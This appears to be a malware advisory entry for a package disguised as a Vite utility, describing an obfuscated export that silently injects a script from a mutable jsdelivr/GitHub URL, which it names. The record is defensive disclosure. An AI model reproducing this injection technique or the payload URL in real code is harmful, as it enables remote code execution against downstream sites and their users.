MAL-2026-6088

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (b1d3397d754ffeb3726496769b2f159ce8596b2233b5875afa8f7fbca29ed0fd) The package presents itself as a Vite utility library but its only export, loadFilbetScriptSilently, creates a <script> element whose src is hardcoded to https://cdn.jsdelivr.net/gh/gongben2024/network-security@main/src/filbet.js and appends it to document.documentElement, causing the consuming application to fetch and execute whatever JavaScript that URL currently serves. The URL is unpinned (mutable @main branch), is hosted under a personal GitHub user account unrelated to the package publisher, and has no integrity/SRI check. The shipped dist/index.js is the only file in the package and is heavily mangled with obfuscator.io (string-array decoder, hex identifiers, rotation loop), and package.json's devDependencies include gulp-javascript-obfuscator — confirming the obfuscation is intentional and hides the injector. The export name suffixed 'Silently', the cover-story package name, the obfuscation, and the off-publisher mutable code source jointly indicate a remote-code-execution dropper aimed at the downstream web application's origin and its users.